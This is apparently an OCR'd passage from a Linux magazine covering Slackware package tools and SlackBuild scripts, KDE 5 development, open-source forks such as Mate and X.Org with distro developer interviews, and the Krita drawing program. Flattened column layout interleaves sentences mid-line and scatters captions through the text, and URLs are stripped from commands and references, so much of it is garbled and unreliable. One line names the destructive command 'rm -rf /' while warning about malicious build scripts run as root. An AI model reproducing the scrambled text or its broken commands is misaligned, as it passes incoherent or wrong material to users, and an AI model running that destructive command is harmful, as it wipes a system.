with scripts from Now, Slackware is not magic. I have trashed The first line updates the information on the Slackware systems too, but when I did I could usually packages, a bit like apt-get update, and the second
see the trouble ahead, and could decide to leave well line brings up a Curses menu where you can choose
alone until after some important work deadline was which upgrades to apply. Slackpkg is shipped with
behind me. And if I did take the plunge and trash the Slackware and it only works with packages in the
system I’d know exactly what I’d done and so could fix official distribution. However, there is a plugin for it,
it fairly easily. called slackpkg+, that enables you to work with a
number of other repositories, such as long-time
Simple package handling scripts Slackware contributor Eric Hameleers’ packages and
I rely on a trio of Bash scripts provided with Slackware:
installpkg, upgradepkg and removepkg. These scripts Another key difference with Slackware is that
do what they say, and take one argument, which can upstream sources, including the Linux kernel itself, are
be either, the name of the package, foo, or the full rarely patched. Yet again, it’s for simplicity’s sake. It’s
filename, foo-1.6-i686-LV.txz. There are also a simpler for the maintainer (and remember, Slackware
number of options that are explained in the provided really has only one full-time maintainer) but it’s also
man pages, but if you want to know exactly what’s simpler for a user who wishes to alter the system by
going on you can read installing, say, a different version of PHP, or even the
“Another key difference with the scripts yourself
with less /sbin/
kernel itself. It’s also a bonus for upstream, because if
they get feedback from a Slackware user they can be
Slackware is that upstream upgradepkg. reasonably confident that the bug wasn’t introduced in
sources are rarely patched.” The installpkg script
extracts the tarball in
a patch.
place in the filesystem SlackBuilds
tree (/usr, /etc, /lib and so on), and then, if a file called Slackers like to know where their packages come exists, it’s run for post-installation tasks. from – personally I only install packages from three
The upgradepkg script is simple too – it installs the sources: official; Eric Hameleers’ repositories; or those
new version of the package specified, say foo-1.6, I build myself. A Slackware package is usually created
then checks to see what files were present in the with a SlackBuild script, which is a Bash script that
foo-1.5 package but not in 1.6, and removes them. takes the source (or a binary distribution) and turns it
If you want to find out what packages you’ve got into a Slackware package. For example:
installed, all you need do is look in the /var/log/ wget
packages directory. Every installed package will have a tar xvf foo.tar.gz
text file present with the same name of the original cd foo
package file, but without the extension, eg foo-1.6- wget
i686-LV. The file will list every file in the package with ./foo.SlackBuild
its full path. In the spirit of being *NIXy, you can then installpkg /tmp/foo
examine the status of packages using file and text First we get a tarball that contains the SlackBuild
commands. For example, if you’re wondering if script and other related files (or we could just write a
package foo is installed and, if so, what version, where SlackBuild ourselves). We then extract it and cd into its
from and when you installed it, just do directory, then download the source code. At this point
ls -l /var/log/packages *foo* I’d usually stop to glance over the SlackBuild so I can
see what it’s going to do. Then the script is executed
and the package is installed. Whenever it’s available, I Old yet up-to-date
also like to check the GPG key or MD5 sum of As Linux emerged from infancy, Slackware and donations. It does have a strong
downloaded files. became the most popular distribution by community, which can be found on IRC, but I
At simplest, a SlackBuild script for something that proving its worth as a more reliable fork of generally seek help and offer advice on the
the now defunct Soft Landing System (SLS) forums at A few
uses the common autotools build method could be
distro. Debian was released slightly later in community members are worthy of mention, in
tar xf foo-1.6.txz 1993 and, in contrast to Slackware, evolved particular Eric Hameleers (aka Alien Bob) and
cd foo-1.6 with a democratic and distributed Robby Workman, who you might call core
./configure philosophy, and now has an impressively contributors to Slackware, and Stuart Winter
make large community and has spawned many (aka drmozes) who maintains the ARM port.
more derivatives, most notably Ubuntu. Slackware is on version 14.1, released in
make install DESTDIR=/tmp/foo-1.6
There are quite a few distros based on November 2013 with the 3.10.17 kernel in 32-bit,
cd /tmp/foo-1.6 Slackware, including Slax, Vector Linux 64-bit and ARM editions, and UEFI hardware
makepkg /tmp/foo-1.6-x86_64-LV.tgz Zenwalk and Salix – each of them adding installation is supported. There’s also an elegant
The first few lines should be familiar. The fifth line different things, such as a live CD/USB multi-lib (ie supporting both 32- and 64-bit)
copies the build products (binaries, libraries, icons etc) version and more featureful (but more solution maintained by Eric Hameleers.
complicated) package managers. Releases have averaged at about once per year
to the /tmp/foo-1.6 directory, within which you’ll
Slackware has just one professional recently, but if you feel a bit more bleeding edge,
typically find directories such as /usr/bin, /etc, /lib/ maintainer, Patrick Volkerding, who draws you can keep updated to Slackware-current
and so on, corresponding to where the installed files his living from subscriptions, merchandise which will eventually become the next release.
should end up. The final two lines will make the
package. DESTDIR isn’t always supported, but usually
there’s an equivalent parameter that does the job. you can peruse the concise README and then check
Notice that the package file name is conventionally of to see what dependencies it has. If there are none,
the form PACKAGENAME-VERSION-ARCHITECTURE- then a key press tells sbopkg to download the source,
BUILD. The last bit is useful to keep track of where a check MD5 sums, run the SlackBuild and install the
package has come from and who built it. package. If there are dependencies, you can add the
Usually SlackBuilds have extra lines to standardise current package to a queue for later processing, and
them and make them easier to update, eg $VERSION then search for each dependency, adding them to the
could be defined up front, so that the version number queue as you go. Once you’ve queued them all up, hit a
1.6 doesn’t have to be scattered throughout the script. key and it’ll process the entire queue.
Other common additions to scripts are to remove If hunting down dependencies really does become a
extraneous files left over from the build process, copy chore, you can use a tool called sqg to generate queue
README files into the package, add path prefixes files which effectively turns sbopkg into a package
such as /usr, and even patch the source. The rule of manager with automated dependency resolution.
thumb is to stay close to what upstream provided.
The future?
The lazy way to slack Slackware has been around for a while, and it shows
I rarely write my own SlackBuild scripts these days no sign of going away anytime soon – but what if
– in fact I rarely even run SlackBuild scripts myself. My Patrick Volkerding decided to abandon it, or he
preferred modus operandi involves two excellent became unable to continue? Most of the main distros
resources from the Slackware community. aren’t reliant on one person, and even if, say, Red Hat
The first is, often abbreviated to Inc went under, it’s probable that Fedora would
SBO. This is a website with a repository of scripts for continue, just as Mageia was forked from Mandriva
packages that are not present in the full Slackware after its company got into trouble. It’s likely that
distribution. Each script has its own page with a link Slackware too would continue in some form with
for downloading the SlackBuild tarball that includes volunteers from the community stepping up, but the
the SlackBuild script itself with a README and an info distro would inevitably change in character because
file with information about the source, such as Slackware is imprinted with Patrick’s personality.
download link and MD5 sum. SlackBuilds is an I’ve spent serious time with Ubuntu, CentOS, Mint,
excellent resource and relies on community Red Hat, Arch and Tiny Core, and learned different
contributions, but is moderated by a small team who things from each of them, and can see how they suit
ensure that standards are kept high and that no silly or others’ needs, just as Slackware suits mine. Slackware
malicious SlackBuild scripts are admitted – since is like a very cleverly designed machine in which you
SlackBuilds are often run as root, you really don’t want can see how all the various intricate parts work
one to have rm -rf / lurking inside it. It’s also worth together. Not only can you gain a deep insight into
noting that all the scripts on will GNU/Linux by spending time with Slackware, but you
assume a full Slackware installation. will feel in control of your software and hardware. In
The second essential resource is sbopkg, which is a an era in which we have good reason to believe that
Curses-based tool that makes it easier to work with our consumer electronics, in sealed units with It allows you to search for a package proprietary software, may be used to spy on us, this
by any fragment of its name, and once you’ve found it, is especially reassuring. 29
KDE 5 is going to be magical. KDE contributor Jos Poortvliet tells us
about its development, its organisation and what we can expect.
DE technology goes much further than its developers was to build a modular base suitable for
humble beginnings in 1996, when we started multiple different user interfaces. This may seem an
out building a desktop environment. KDE obvious goal today, when everyone is talking about
today has many hundreds of active developers. They the convergence of high-resolution displays, tablets,
not only make a desktop, now called Plasma Desktop, mobile phones, media centres and so on, but KDE is
but also a variant for tablets (Plasma Active), and TVs still unique in its ability to unify the different form
(Plasma Media Centre). Even the humble Plasma factors at a code level.
Netbook is already five years old. Meanwhile, KDE
applications have gone beyond simple clocks and Plasma
calculators – we have a full office suite, mail and Plasma is the desktop component that most people
calendaring, video and image editors and much more. think of when they hear the words ‘KDE 4’, and it took
KDE applications are some time to mature.
being ported to multiple
platforms – from
“KDE is no longer just a desktop This was in part due to
its ambitious design, but
Windows and Mac to environment – KDE is our also because the
Android. And our libraries
(KDE Frameworks) are
people and our technologies.” technologies it’s built
upon were not mature
going modular, making enough for its needs.
them freely available to a far wider audience than just This is still a problem today, and while it’s very stable
KDE developers. Today, KDE is no longer just a Unix the 4.x series has workarounds to deal with the
desktop environment. KDE is our people and our deficiencies in the platforms below it.
technologies; Plasma, Applications and Frameworks. This is where the next generation of Plasma
Plasma was conceived as the next generation of technology comes in; Plasma Next. Sebastian Kügler
KDE’s desktop technology. Its architecture was (aka Sebas), team lead at Blue Systems and at the
drafted in 2006 and 2007, and the goal of the very heart of the current group of Plasma developers
simply puts it, future Plasma is going to be more than
new technology, “We don’t want to pass the
opportunity to fix what nags us and our users.
Improvements in details mean that we listen to our
users, a large portion of whom do not want to be the
subject of UI experiments, but who require a reliable
system that supports and improves the personal
workflows they have almost brought to perfection.”
With Plasma Next the team can start working on
bringing seamless switching of workspaces when
moving from device to device. For example, plugging
a keyboard and mouse into a tablet can trigger
Plasma to transform its tablet-and-touch optimised UI
into the desktop interface. But these advanced
features do not take away from the familiar interface.
As Sebas continues, “The Plasma team is fully aware
of the value of established workflows of computer
KDE 4 has become a
users and the need to not disrupt them. This means Heiko Tietze, a specialist at User Prompt GmbH
fantastic desktop, and
that there will be minimal feature loss or changes in usability consultants, explains the role of the usability KDE 5 shouldn’t break any
the setup of the desktop. Just butter-smooth team: “Having the ordinary user in the brainstorm, as of the good work that has
performance, a polished look and more flexibility.” well as ambitious designers acclimatised to a different been put into getting the
environment, sometimes leads to strange results.” desktop this far
Visual Design Group “Some people may just dislike the currently popular
The idea behind the Visual Design Group (VDG) was to flat design, for instance, but others have to struggle
build a team in KDE that would focus on design. This with accessibility. And the next wants to keep the
is done in a rather novel way, led by the enthusiasm of workflow as it is. The usability guys put on the brakes
Jens Reuterberg, a FOSS enthusiast and designer in case of ideas that have large-scale effects.
from Sweden. He calls it: “a social experiment. On the Violations of the present interaction are a major
one hand the goal is to create a stunning visual design product risk and need to be tested in advance.”
for Plasma Next, on the other the plan is to create a “One focus of the work of the usability team is the
community of designers and make design a ‘thing’ involvement of users,” adds Björn Balazs, owner of
within Plasma and KDE and open Source in general.” User Prompt and contributor to the KDE usability
“I want to change the way we look at people and team. “Even before we start working on an application
stop dividing them into experts and ‘everyone else’. I we conduct surveys to understand how users are
want to tear down those barriers and makes us all feel going to benefit from the application. If needed we use
included, like we’re a part [of a whole], like I felt on the online tools to sort and prioritise information. We then
first sprint I was at. I want to change the way we present sketches, clickable mockups or screencasts
handle design and this work is a test for that.” of our ideas to give users the possibility to give
Since the inception of the design team, work has feedback. In this way improve the interaction design
been done in many areas. There have been new icons based on real feedback from a large base of users as
and improvements to existing design elements of the coding of the application goes along.”
KDE software, but the majority of work has been
focused on Plasma Next. A widget theme, a cursor Usability
them and new icons are all in the pipeline, but the Apart from working directly with developers and
team also looks at interaction design and workflows training them, the usability team has been reworking
in the interface, working together with the KDE KDE’s Human Interface Guidelines. According to
usability team. Heiko, “KDE as a whole has to have a common
KDE 4 makes it difficult to
work with HiDPI screens
whereas the new Plasma
desktop should make full
use of your monitor’s
The new Oxygen font is part of providing a unified visual known DPI, whatever its
front for the desktop design. physical size. 31
KDE 5’s new flat look is
branding, which is up to the designers, but also a
very fashionable at the
moment, but we like it. unique and consistent way of interaction. As a first
step to get there, we pushed the old human interface
guideline to a new level, together with the Visual
Design Group, which was working on the presentation
side of things.”
KDE Frameworks
Experiences in the world of mobile and web
applications have shown that users are far more likely
to start using features and appreciate small batches
of them instead of large dumps. Short release cycles
can bring bugfixes and improvements to users much
faster. On the other hand, most users of KDE access
their software and updates through the downstream
distributions, which are on slower release cycles even
though they have repositories for updated software.
Albert Astals Cid, from the KDE release team, points
out, “This discussion needs to include the distributions
as much as the upstream developers. And in any
case, both KDE release infrastructure and promotion
will have to be adjusted as well.”
This discussion was started on the community list
by Mario Fux, release team member and better known
as the organiser of the famous ‘Randa’ meetings. His
proposals, based on extensive discussions with key
members of the release team and developers, include:
Cleaning up the core set of KDE applications.
Grouping releases in a regular but non-mandatory
Making the KDE Applications 4.15 release a Long
Term Supported one, moving to Frameworks 5
after that.
The trend towards shorter release cycles requires
many questions to be answered before it becomes
feasible in practice. But a move to Frameworks 5 is
certain to happen at some point – the question is
when, not if. Albert highlights the main problem, “We
need to move to KF5 since we don’t have the
manpower to keep supporting both 4 and 5 versions
of apps; but we can’t rush the move to KF5 since we
can’t afford bad quality. My thinking goes between
killing the KDE 4.x applications release concept and
switching to a “KDE Applications 2014” release
concept, where apps can either be 4- or 5-based and
making 4.14 a very long supported release with the
ability to add small new features while we do releases
of 5 with the apps that are ready. The first helps with
making sure apps move to 5 when they are ready and Activities and Widgets are still a central part of the future of
not rushed. It has the problem that some people will KDE, but the way you interact with them is being refined.
KDE e.V. Most of the mystery surrounding KDE’s organisation is thanks to German law
You can’t talk about KDE and governance without
bringing up KDE e.V. (eingetragener Verein or
registered association). This German non-profit is
the legal organisation behind the KDE community,
and it plays several important roles. Initially set up
to handle funding for KDE’s conferences, the e.V.
now organises events all over the world, from Camp
KDE and Lakademy in the Americas to
in India. In addition, many Developer Sprints,
usually with about 5–15 people, are supported, as
are the annual meetings in Randa in the Swiss Alps,
which can attract 40–60 developers. It also
provides legal services and pays for infrastructure
such as servers.
But the eV is also an agent of change, as Each year, KDE developers get together at the Akadamy conference. Last year’s event was in
Cornelius Schumacher, president of KDE e.V. and Bilbao, while this year’s is in Brno, Czech Republic. Photo CC-BY-SA: Knut Yrvin
long-time KDE contributor explains: “KDE e.V.
provides a place where core KDE contributors come A recent example of KDE’s ongoing improvement others what you are about. The KDE Manifesto
together and discuss a wide variety of subjects. efforts is the KDE Manifesto. This has been a long made plain what was involved in being part of the
“In the last eight years or so, KDE e.V. has been time coming, but Kévin Ottens, a core KDE KDE Community, including the benefits and the
the major driver behind increasing the number of contributor instrumental to the KDE Frameworks 5 ways we operate.
developer sprints and has created the Fiduciary efforts got it to the finish line. As Kevin said, “Something like the KDE Manifesto
Licensing Agreement, which allows it to re-license The Manifesto explicitly defines the KDE was necessary because we’re an extremely
KDE code when needed, while protecting developers’ community’s values and commitments to each self-organised community. At some point you need
interests. The Code of Conduct originated with KDE other. The importance of this can hardly be some form of regulation, and since we wouldn’t like
e.V., as did the Community Working Group, which overstated – knowing who you are and what you something bureaucratic, relying on culture and
helps deal with communication issues.” want helps you make decisions but also shows values instead is a much better match.”
prefer to keep doing features in their 4 version and will libraries that KDE software depends upon. Distributed
delay the port to KDE 5 indefinitely.” as a single set of interconnected libraries, they form a
The 4.x series will be with us for the time being, and common codebase for (almost) all KDE applications.
a Frameworks 5 series will be available at some point The KDE Frameworks – designed as drop-in Qt Addon
in parallel. Regardless of the series, applications will libraries — will enrich Qt as a development
work fine under any desktop. Developers want to environment. The Frameworks can simplify, accelerate
ensure that migration is not an issue. and reduce the cost of Qt development by eliminating
When KDE began more than 15 years ago, the need to reinvent key functions.
development was application-driven. Libraries were
intended to share work, making development easier All change
and faster. New functionality in the libraries was added Qt is growing in popularity. Ubuntu is building on Qt
based on simple rules. For example, if a particular and QML for Ubuntu Phone and planning to move
functionality was used in more than one place, it was over the desktop in the future. The LXDE desktop and
put into a shared library. Today, the KDE libraries GCompris projects are in the process of porting over
provide high-level functionality like toolbars and to Qt. Subsurface (a divelog project made famous by
menus, spell checking and file access. They are also having Linus Torvalds as core contributor) has had its
used to fix or work around issues in Qt and other first Qt based release. With Frameworks, KDE is
getting closer to Qt, benefiting both, as well as more
and more users and developers.
But in all this change, it is crucial that the KDE
community preserves what makes it work well. KDE
has gotten where it is today by the culture and
practices of today. Like in any community, these are
hidden rules that enables KDE to pool the knowledge
of so many brilliant people, and without too much
politics, to make the best decisions possible. This
includes well known Free Software soft rules like Who
Codes, Decides, RTFM, Talk is Cheap and Just Do It,
but also very KDE-like rules such as Assume Good
Intentions and Respect the Elders. And, as Kevin
Ottens points out, “just like in the French Liberté,
Egalité, Fraternité, the rules are inseparable and
As Linux graphics moves away from X11, KDE’s compositor interdependent. They are what makes KDE such an
will support Wayland without too much effort. amazing place, full of creativity, innovation and fun.” 33
Fork it!
Forks have created some of the best projects in Free Software,
but their origins are usually controversial and messy.
Mike Saunders investigates.
magine you’ve been using a certain program for gather together some fellow hackers to begin work on
years. You absolutely love it, and you can’t live an open source version of your beloved app – but it
without it. You know every feature, menu item and could take years to reach the same level of functionality.
keybinding like the back of your hand. Then suddenly the In other words, you’re stuck.
development team announces a major change: they’re Fortunately, we users of free and open source
redesigning the interface, or removing features to make software don’t have this problem. At any point we can
the program more take a program’s source
accessible to newcomers.
You’re incensed. You join
“The ability to fork a program code and split it off – or
“fork” it – into another
the hordes of angry users is one of the Free Software project. It happens all the
on forums and IRC, and
complain bitterly about the
community’s great strengths.” time, sometimes for good
reasons, and sometimes for
program’s sudden change bad ones, but without
of direction. You’re deeply disappointed, and while you question the ability to fork a program is one of the Free
may be able to understand the argument from the Software community’s great strengths.
developers’ perspective, it doesn’t stop the fact that the Many of the most popular and famous programs we
program you use every day and may even depend on for use began as forks, often in controversial or unpleasant
your livelihood is about to change drastically. circumstances. So over the next few pages we’ll explore
Now, if this were a closed source program, you’re up a why forks happen, look at some of the most notable, and
certain creek without even a Starbucks coffee stirrer for talk to developers who’ve forked projects to see if they
a paddle. If you’re a programmer, you might be able to can reunite their codebases further down the line.
When development paths diverge
he most common catalyst for a fork about three years before they start the
is when the development team next ground-up rewrite that will replace
behind a project decides to redesign the interface you love with something
the software, or focus on a different type of you will almost certainly consider an
user or platform. A great example of this is unwieldy abomination, and you will
Gnome 3, which is one of the most suddenly find yourself begging for
controversial overhauls in the history of Free configuration options.”
Software. Previous versions of Gnome 2.x That last quote, in particular, reflected
had been rather conservative in their much of the sentiment from long-time
approaches to the desktop – you had a Gnome users. It had taken many years and
familiar taskbar-like panel, a software menu, releases for Gnome 2.x to reach a state of
and so forth. maturity and completeness – and now the
Then the Gnome team announced a developers wanted to rewrite major chunks
major redesign, which featured a completely of it from scratch? What’s the point of
different way of working with and managing getting used to Gnome 3 when Gnome 4
windows. There was going to be more focus could just change everything once again?
on touch interfaces, while some advanced
features and customisation options were Flexing the muscles
removed in the name of simplicity and Incidentally, this is one of the by-products
consistency. As expected, there was uproar when a largely unpaid community develops
among many Gnome users. Here are some a project. Maintaining feature-complete and
classic quotes from the internet as Gnome 3 stable software is boring: you can’t show off
was released: your awesome programming skills. Many of
“A thank you is in order from the the original Gnome 2.x developers moved on
Xfce team, as the release of Gnome 3 to other things as the years went by, while
has urged me (and many others) to newer hackers wanted to make more
switch to Xfce.” aggressive changes.
“Gnome 3 does put you into the Some people loved Gnome 3, and it
driver’s seat – that of a train on a brought some fresh approaches to the table
single track.” of UI design. And even though the first few
“If Gnome 3 happens to coincide releases were pretty rough around the
with the ways of working that you find edges, new (or previously existing) features
most efficient, then congratulations: have been added over time.
you are a very lucky person. Enjoy the Anyway, as expected, it didn’t take long for
productivity while it lasts – you have a fork of Gnome 2.x to arrive. An Arch Linux
user known as Perberos set up the Mate
project (, which
Proprietary forks intended to keep Gnome 2’s codebase up to
date. That is, it would be updated to fix bugs,
Closed source forks of Free Software are rare,
close security holes and work better with
thanks to the GNU GPL licence, which prohibits
them. But not all projects use the GPL, and modern libraries. Initially Mate was
other licences let companies take an originally dismissed by many on the net: comments
open source project and create a proprietary like “it’s doomed to fail” or “nobody wants to
fork. Orbis OS, the operating system that’s used maintain it” were common.
on the PlayStation 4 is a good example: it’s
Yet Mate development ramped up;
based on FreeBSD 9, but Sony is under no
obligation to release its modifications back to distributions started to include it in their
the community. repositories, and now we have an attractive
Wine, the Windows compatibility layer that’s and modern Gnome 2.x-like desktop
famously not an emulator, used to be released environment that’s a great alternative for
under the X11 licence, which allowed a few
those who dislike the Gnome 3 style. In the
proprietary forks, such as Cedega, but later on
the Wine team switched to the GNU LGPL. And end, everybody has won – but it was a
this is why the GPL vs BSD licence debates painful process getting here.
never stop: BSD supporters claim to have the
most “free” licence because there are very few
restrictions, whereas GPL fans say they are
You can’t see the details here (full version at
more free because their restrictions enforce, but this graph
freedom down the line. shows the hundreds of distributions forks since
Linux came to life. 35
When developers just don’t get on
evelopers can be a prickly bunch,
and while the best code should
always win, personalities often get in
the way of progress. Many projects have
forked because of spats between
developers, such as when Theo de Raadt
was ejected from the NetBSD operating
system team for “a long history of rudeness
towards and abuse of users and developers”
of the project. De Raadt went on to make
OpenBSD, which brought us OpenSSH and
LibreSSL – both essential tools.
But the most notable fork involving
developer personality clashes was XFree86
and X.Org. In 2003, XFree86 had been the
standard X Window System implementation
on Linux for many years, and development
was sluggish. The “core team” was regarded Gnome 3’s redesign was both loved and hated, but thanks to Mate the old 2.x codebase stays alive.
as an old boys club, hindering progress, and
Keith Packard, one of the most experienced professional career”. Packard was booted away from XFree86, with the source code
and respected of the X Window System off the XFree86 project – but that didn’t stop becoming more modular and easy to
developers, started to look into starting a him. He created, a meeting place compile, while the need to edit the dreaded
new project. for X developers who wanted to work in a configuration file became rarer thanks to
David Wexelblat, a member of the more progressive and transparent project, auto-configuration.
XFree86 core team, launched a scathing which eventually led to the X.Org server used Many other forks have become the
attack on Packard via the mailing lists, in virtually all Linux distributions today. “standard” versions after a while. EGCS split
accusing him of doing one of the most XFree86’s popularity declined rapidly, and off from the GCC compiler suite in 1997,
“low-class, unprofessional, and tactless by 2009 it was effectively dead. Meanwhile providing various experimental new features,
things I have ever experienced in my X development picked up pace as it moved and GCC development stalled. Then in 1999,
the Free Software Foundation “blessed”
“XFree86’s popularity declined rapidly, and by 2009 EGCS as the standard compiler, and the
it was effectively dead. Meanwhile X development projects merged. Similarly, LibreOffice forked
from, and has become the
picked up pace as it moved away from XFree86.” most used flavour of the office suite in major
distros today.
When forks are encouraged
There’s something I’d like to share from my own
personal experience of running a Free Software
project. From the outset, MikeOS (http://mikeos. was designed as a learning tool to show
how a simple 16-bit assembly language
operating system works. Over the years I’ve had
countless patches thrown at me from
developers around the world, often
incorporating brilliant new features, but usually
I’ve turned them down. They add layers of
complexity and support for things that I don’t
know inside-out, making the project lose track
of its goal.
One developer was submitting so many great
new features and additions that I said: “OK,
because we can’t fit all these into the project,
please fork into a super-MikeOS and share your
work with the world.” And TachyonOS (https:// was born. I
was delighted to see this fork – it meant that
MikeOS stays true to its focus, while new
Here’s the latest update to the XFree86 changelog – from 2009! The project effectively became features can be added elsewhere.
dormant after it kicked out Keith Packard, one of its most talented and respected developers.
From the horse’s mouth
rojects are still splitting today. This is
especially common in the
distribution world: someone takes
distro A, changes a few packages and the
desktop theme, and releases distro B. Fair
enough – FOSS is all about freedom and
choice – but our community often ends up
with many distros doing almost exactly the
same thing, and duplicating a lot of effort.
With this in mind, we contacted a bunch
of distros that began life as forks, and asked
them if they could consider merging with the
original (or very similar) projects. For
instance, Mageia and OpenMandriva both
started as forks of the newbie-friendly (and
now defunct) Mandriva distro. Kate Lebedeff
of OpenMandriva told us: “We know some
contributors from Mageia team, some are
friends, and we often meet at events and LXLE ( is a fork of a fork of a fork, but it’s still a jolly good lightweight distro.
conferences, exchange ideas, experience
and expertise, but so far contacts are not likely, and likely to be more valuable, would technical help. That was fine with me
that regular.” be some collaboration, in packaging in because I had no intention of changing my
When asked if she could ever see the two particular, to achieve those benefits without ideas because someone claimed to have a
distro merging, she responded with: “We are having to completely merge the projects.” ‘title/role/association’ with the Lubuntu
fully open for discussing collaboration project. It’s an old saying: those looking for
options with all responsible open source The *buntu variants power/authority are the very ones that
communities and persons – everybody is Next, we asked Ronnie Whisler of LXLE (a should never have it… I have very little
welcome to join.” Mageia and OpenMandriva distribution based on Lubuntu (which is contact with them outside of bug reports.”
have some technical differences, but it’d be based on Ubuntu (which is based on
good to see the distros working together Debian))) if he considers his project a fork, or Linux Lite
more closely in the future, and it’s a good a distro in its own right. He gave us an Finally we talked to Jerry Bezencon of Linux
thing that neither party rules it out. insight into the frustration that can grow Lite, an Ubuntu-based distro featuring the
inside developers, which leads to new Xfce desktop. We asked him if having
Mageia/OpenMandriva projects being born. multiple distros with very similar aims (given
When we asked Mageia the same question, us: “I don’t consider it a fork, nor really a that Xubuntu already exists) helps Linux
their press contact told us: “There are distro for that matter. It’s an eclectic respin, adoption, or it just leaves newcomers to the
certainly no current plans to merge the two and while it can be argued that most distros operating system feeling confused. He said:
projects, as they are probably quite are essentially respins, I think LXLE is “Newcomers are a lot smarter than some
diversified now, but I don’t think we would probably the poster child as such.” give them credit for. They’re quite capable of
ever say never.” Developer David Walser Whisler explained that he got tired of choosing a distribution that exactly meets
provided a more thorough response: installing Lubuntu and making the their everyday needs. Social media, online
“Some have cited technical reasons for customisations that he needed each time. articles and reviews, magazines and
not merging when this question has been But instead of making his own distro to YouTube videos provide a wealth of
raised in the past, but those concerns are solve this, couldn’t he have tried working information on which they can base their
overblown, and not at all insurmountable if with the Lubuntu team to get his decision. ‘Distro hopping’ also enables
the two communities really did want to modifications and proposals integrated? people to find what they are looking for.
merge the distributions… However, for the “I made a few of my ideas known on Choice is empowering; people react badly
two to merge, they’d have to agree on a mailing lists and such, but they were mostly when that is no longer available to them.
shared philosophy for what they’re trying to ignored or I was told why they weren’t good That is directly evident from reading our
develop, and both communities would have ideas, by the moderators mostly. The actual feedback page where people have stated
to see value in merging. ‘Lubuntu Team’ never contacted me directly that after X number of distributions, they
“There currently are enough philosophical – a couple of their ‘social servants’ did have finally found one that they can settle
differences to make it hard to imagine though, after LXLE became available, and on:
happening in the near future, though there that proved to be difficult at best. They I’m not against pooling resources – that’s
would be obvious value on both sides of seemed only interested in telling me what I simply not our focus at the moment, but one
sharing development resources and should do and what I should learn. Outside day it may be. For now, the end user has our
reducing duplication of effort. What’s more of that however there was little actual undivided attention.” 37
The Gimp isn’t the only great drawing tool for Linux.
applications isn’t doing it any favours.
This is a shame, because it has the
Why don’t you have a go at
Gimp’s GUI while you’re at it!
potential to become the best image It has something to do with glass
Krita – isn’t that the KDE- creation tool on Linux. houses. There seems to be
based graphics editor you something of a tradition with graphical
reviewed in a previous issue? But we already have The Gimp, editors that the GUI needs to be as
Yes it is. We reviewed version 2.8 which is great! sprawling and as incomprehensible as
back in issue 2. We liked it. But Exactly. That’s popular possible. Adobe Photoshop has this
more importantly, we don’t think misconception number one. The problem, as does Blender. And so too
enough people know about it. One of Gimp is a venerable, powerful and does Krita. But as with all these tools,
the reasons why it’s sometimes stable pixel editing tool. We couldn’t do after you get used to the layout, it’s no
overlooked is because it’s part of KDE’s our jobs without it – whether that’s longer a problem but a feature. We just
Calligra suite of applications, which loading Photoshop files on Linux or feel for beginners when presented with
includes a word processor, a exporting PNG files with alpha channels so many options and buttons to click.
spreadsheet and a presentation intact. But Gimp fulfils a very specific And things are getting better. We
package alongside an ideas-mapping requirement; image editing and could have forgiven you a few years ago
tool and a vector drawing application. transformation. It’s not great at image if you thought Krita looked like an
Not only is it easy for Krita to get lost creation and its development has interesting idea in need of a little extra
among its fellow roommates, but the slowed to a crawl. It’s lacking CMYK effort. But those times are gone and
drawing components in office suites support, for instance, which is essential Krita is now a fully fledged application,
haven’t always set the world on fire. if you’re working with print, limiting its and incidentally, one of the most
use as a tool for professionals. It’s also powerful of its kind regardless of
You mean like the Draw app burdened with a rather stupid name. operating system.
that’s part of LibreOffice?
Sadly, yes. Krita is a worthy Krita hardly rolls off the What advantage does Krita
application in its own right, and tongue either… have over Gimp?
perhaps being bundled into such a That is true. But at least the word First, it’s important to understand
broad suite of loosely related ‘krita’ is Swedish for ‘crayon’ that Krita is a different kind of
which says something about Krita’s application. It’s meant primarily for
target audience. Could the same be creation rather than editing, and
“Krita has the potential said for The Gimp? And there’s also
another big advantage with Krita’s
specifically, creation by drawing. Krita
can edit images, enable you to select
to become the best image name; you can safely let your children areas, create layers and add filter
creation tool on Linux.” type ‘krita’ into a Google image search
without looking over their shoulders.
effects – many of the same things you
can do with Gimp. But Krita is not very
good at being pixel perfect. Instead, it
has many tools that can emulate the
various elements that traditional artists
use to create their art, and when these
are combined with the all the other
features, it becomes a fully fledged
creation tool – from initial ideas and
concepts through to the finished image.
One of its best features is being able to
work with both bitmap and vector
layers at the same time.
Does that mean Krita is only
going to be of use to iPad-
loving David Hockney?
Not at all. Of course, you can
choose to create images with a
tablet and a stylus – Wacom tablets, in
particular, have become a great option Even though Krita is designed for drawing, it can still process and use bitmap images
since the community-sponsored
Wacom Linux Project gained
momentum. For many illustrators that’s dozens brush types and simply projects, and that’s using crowdfunding
the only way to work, and many sketching onto the blank canvas. The to help with development. This is in
illustrators choose to use Krita for results can be uncannily like drawing marked contrast to Gimp, for example,
exactly this purpose. But Krita is for with pencil, or crushing charcoal into a which has struggled to get funds,
everyone. Drawing can be useful. But page, or squeezing gouache into a despite its ubiquity and widespread
it’s also fun and educational. Remember canvas. It feels like the first time you adoption. The spark behind Krita’s
Deluxe Paint, for instance? played with Deluxe Paint or Photoshop. campaign was the widespread positive
But it’s the brushes that are Krita’s real reaction to the previous release, which
Wasn’t that a drawing asset, because there are so many was mostly attributed to the full-time
application for the Amiga? models and so many types to choose work of developer Dmitry Kazakov. The
Yes! In the 80s, back when between. We’ve never seen anything like new campaign asked for €15,000,
everyone loved Electronic Arts, Krita’s brush engine. enough to pay Dmitry for six months,
Deluxe Paint was a drawing application and split those six months into 24
bundled with those early machines, and But The Gimp has lots of separate features all estimated to take
was created by Dan Silva to coincide brushes too! two week’s worth of work. That way,
with the release of the Amiga 1000. It does. But there’s more to Krita’s backers could see exactly what their
Deluxe Paint helped all those early brushes than a repeated bitmap funding would bring. Highlights include
adopters see the full potential of the and an opacity setting. It uses drawing some spectacular warp and perspective
Amiga’s graphics capabilities, as well as tools and brush engines to build models transform tools, colour correction in
realise their own latent drawing talent. that modify pixel data to approximate a OpenGL and a resource manager. We’re
But it also helped them master the specific brush type. This is one of those happy to report that Krita reached its
mouse. This was important because for instances where a picture is worth a target, so we’ll all be able to benefit. If
new users, the mouse was a completely thousand words, so rather than you still want to contribute, you can
alien concept. explaining the details we’d suggest just donate to the project and everything will
All this is a long-winded way of saying trying a few. Open Krita, create a blank help secure Krita’s future.
that tools like Krita are a good thing not template and use the ‘Brush Presets’
necessarily because they’re for artists, palette (known as a docker in Krita’s Anything else you want to rave
but because Linux is the Amiga of uber-modular GUI) so select one you on about?
modern times, and awesome software like. Now select the pastel brush and a Did we mention it has supported
